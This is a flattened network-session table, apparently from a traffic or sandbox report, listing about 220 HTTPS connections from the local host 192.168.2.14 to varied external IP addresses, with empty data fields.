                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23640192.168.2.144022271.69.186.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23641192.168.2.1440674145.172.226.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23642192.168.2.1456446195.125.85.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23643192.168.2.144391619.148.36.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23644192.168.2.144930623.36.190.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23645192.168.2.143690249.129.181.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23646192.168.2.1444658198.80.31.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23647192.168.2.1437386188.188.136.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23648192.168.2.145096247.6.80.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23649192.168.2.1440470116.143.209.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23650192.168.2.1446008107.24.74.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23651192.168.2.1433612196.98.36.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23652192.168.2.1452724175.56.122.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23653192.168.2.144878649.147.102.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23654192.168.2.143428841.163.106.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23655192.168.2.1455186105.186.128.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23656192.168.2.1433090203.244.176.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23657192.168.2.1451492195.186.101.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23658192.168.2.1439284128.203.145.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23659192.168.2.1443036151.149.21.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23660192.168.2.1452280100.49.214.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23661192.168.2.1436872137.29.77.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23662192.168.2.145592642.8.65.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23663192.168.2.1456428171.227.125.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23664192.168.2.1449182210.115.158.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23665192.168.2.14367464.216.11.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23666192.168.2.1445546220.34.245.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23667192.168.2.1459842141.73.88.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23668192.168.2.1460308191.159.39.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23669192.168.2.1449314161.197.236.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23670192.168.2.1452670186.99.46.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23671192.168.2.14496322.214.127.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23672192.168.2.143851064.146.119.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23673192.168.2.145309299.244.239.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23674192.168.2.1451908113.144.167.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23675192.168.2.1440356106.242.215.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23676192.168.2.144657861.136.108.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23677192.168.2.1446692170.69.170.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23678192.168.2.1460964133.21.222.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23679192.168.2.145467058.47.19.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23680192.168.2.145376031.54.183.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23681192.168.2.1435434130.47.178.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23682192.168.2.1432840113.64.143.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23683192.168.2.1454472109.76.12.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23684192.168.2.1445568222.159.105.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23685192.168.2.1460168159.194.40.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23686192.168.2.1439426140.3.79.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23687192.168.2.1442012170.66.177.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23688192.168.2.1446390134.90.2.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23689192.168.2.146079442.151.42.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23690192.168.2.1433274210.235.164.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23691192.168.2.14592309.190.165.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23692192.168.2.145288854.245.229.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23693192.168.2.1456802102.219.200.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23694192.168.2.1454262117.69.195.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23695192.168.2.1455560178.165.17.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23696192.168.2.1449178162.43.193.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23697192.168.2.1442998204.145.78.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23698192.168.2.144293859.238.93.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23699192.168.2.1440364207.49.56.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23700192.168.2.144499259.41.89.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23701192.168.2.1452870176.41.33.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23702192.168.2.145231057.254.114.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23703192.168.2.144833466.157.235.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23704192.168.2.143920018.16.97.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23705192.168.2.145703435.74.224.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23706192.168.2.144218247.151.62.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23707192.168.2.1452352131.223.168.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23708192.168.2.145018692.72.138.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23709192.168.2.143600223.40.210.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23710192.168.2.1445842109.147.199.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23711192.168.2.143698848.52.183.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23712192.168.2.1450526159.205.171.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23713192.168.2.1440692219.8.177.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23714192.168.2.143524468.133.100.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23715192.168.2.144192658.115.129.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23716192.168.2.1449002124.78.191.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23717192.168.2.144401219.173.129.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23718192.168.2.1451446163.118.20.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23719192.168.2.1456538128.9.137.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23720192.168.2.1442708111.78.200.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23721192.168.2.1455166217.154.185.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23722192.168.2.144669679.12.165.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23723192.168.2.143605813.36.34.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23724192.168.2.1460890200.225.84.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23725192.168.2.143683078.113.197.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23726192.168.2.145638670.31.201.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23727192.168.2.1458910134.203.241.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23728192.168.2.145118471.13.44.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23729192.168.2.1446884135.4.10.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23730192.168.2.1450054101.134.23.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23731192.168.2.1450464165.4.150.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23732192.168.2.1451984199.180.242.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23733192.168.2.143629667.202.144.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23734192.168.2.143784491.97.210.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23735192.168.2.1443214104.85.18.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23736192.168.2.143927859.106.251.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23737192.168.2.144274296.48.124.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23738192.168.2.1450384100.127.19.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23739192.168.2.14477302.219.239.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23740192.168.2.1454968128.107.34.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23741192.168.2.14418848.41.135.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23742192.168.2.1453798104.230.111.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23743192.168.2.143518439.25.33.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23744192.168.2.145378234.236.3.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23745192.168.2.143916653.219.246.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23746192.168.2.1437674149.120.54.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23747192.168.2.145104886.15.212.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23748192.168.2.1459302138.95.177.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23749192.168.2.145404095.168.50.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23750192.168.2.1438516196.101.215.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23751192.168.2.145741491.236.113.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23752192.168.2.144793487.140.34.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23753192.168.2.145355878.84.147.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23754192.168.2.1453878217.237.108.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23755192.168.2.144282054.190.186.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23756192.168.2.143811247.152.132.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23757192.168.2.1458514155.59.20.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23758192.168.2.144313272.39.51.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23759192.168.2.1459950124.164.160.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23760192.168.2.145258235.61.175.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23761192.168.2.1447910159.13.203.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23762192.168.2.1449938186.81.190.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23763192.168.2.1438504173.75.7.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23764192.168.2.145820442.24.181.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23765192.168.2.1436200218.42.66.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23766192.168.2.1443974164.183.72.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23767192.168.2.1433590220.157.235.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23768192.168.2.145210627.25.207.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23769192.168.2.1451484203.167.128.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23770192.168.2.1451390191.200.161.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23771192.168.2.145014813.26.104.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23772192.168.2.1446924176.58.18.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23773192.168.2.143987084.134.21.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23774192.168.2.1443366222.190.205.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23775192.168.2.145276695.77.24.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23776192.168.2.1441372122.139.62.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23777192.168.2.1454608133.61.81.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23778192.168.2.143846668.198.74.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23779192.168.2.1443158108.74.116.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23780192.168.2.1459316161.233.103.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23781192.168.2.145440269.62.76.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23782192.168.2.1440410116.88.239.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23783192.168.2.145479480.58.227.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23784192.168.2.1457218167.61.84.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23785192.168.2.1450370147.84.191.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23786192.168.2.1442488149.27.151.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23787192.168.2.1439390124.201.235.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23788192.168.2.1444538221.70.101.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23789192.168.2.145386260.24.204.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23790192.168.2.144168018.189.118.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23791192.168.2.144964617.143.1.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23792192.168.2.1433298168.243.211.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23793192.168.2.144343070.65.229.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23794192.168.2.1445828164.189.41.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23795192.168.2.1433812114.49.157.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23796192.168.2.1435370122.209.25.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23797192.168.2.1437908106.71.73.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23798192.168.2.1453838141.156.152.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23799192.168.2.1455438151.122.190.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23800192.168.2.1448368113.219.112.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23801192.168.2.1444708206.50.3.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23802192.168.2.1452392209.40.165.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23803192.168.2.144200440.58.59.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23804192.168.2.1437584115.234.254.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23805192.168.2.144414860.157.205.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23806192.168.2.145601652.154.241.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23807192.168.2.1445616107.252.214.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23808192.168.2.144059636.97.182.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23809192.168.2.145054469.33.205.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23810192.168.2.1448380216.13.141.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23811192.168.2.1438922167.206.207.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23812192.168.2.145617091.242.164.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23813192.168.2.1434060173.132.107.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23814192.168.2.145086239.80.106.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23815192.168.2.1458498116.43.46.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23816192.168.2.1457806175.45.21.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23817192.168.2.144750846.65.201.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23818192.168.2.145204427.233.175.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23819192.168.2.1458862125.103.226.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23820192.168.2.143325477.210.73.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23821192.168.2.1455186139.212.57.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23822192.168.2.1447108157.2.124.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23823192.168.2.14553085.179.125.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23824192.168.2.143395293.164.46.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23825192.168.2.1454336121.1.165.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23826192.168.2.1446672114.219.76.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23827192.168.2.145363843.242.159.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23828192.168.2.143586466.224.172.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23829192.168.2.1437146106.221.23.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23830192.168.2.143324081.238.46.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23831192.168.2.144705267.186.135.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23832192.168.2.143741270.27.236.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23833192.168.2.145947046.57.5.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23834192.168.2.1450164181.120.102.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23835192.168.2.1440622207.232.231.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23836192.168.2.1460572119.201.238.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23837192.168.2.143397467.68.103.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23838192.168.2.1440642164.128.155.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23839192.168.2.144452654.64.139.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23840192.168.2.143647080.161.175.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23841192.168.2.1453310101.140.34.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23842192.168.2.1449406213.222.250.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23843192.168.2.1457320130.123.239.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23844192.168.2.1434034212.53.103.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23845192.168.2.143852232.95.57.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23846192.168.2.1446306105.96.65.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23847192.168.2.1451972202.195.70.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23848192.168.2.1433680195.61.250.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23849192.168.2.1453040198.24.171.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23850192.168.2.1439622158.213.45.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23851192.168.2.143907076.174.103.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23852192.168.2.1449364194.172.183.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23853192.168.2.1447104158.2.153.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23854192.168.2.1434808165.226.2.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23855192.168.2.1441826116.0.97.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23856192.168.2.144367043.112.48.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23857192.168.2.144304434.14.197.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23858192.168.2.1447722180.238.59.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23859192.168.2.1448380172.71.136.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23860192.168.2.1458348102.50.237.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
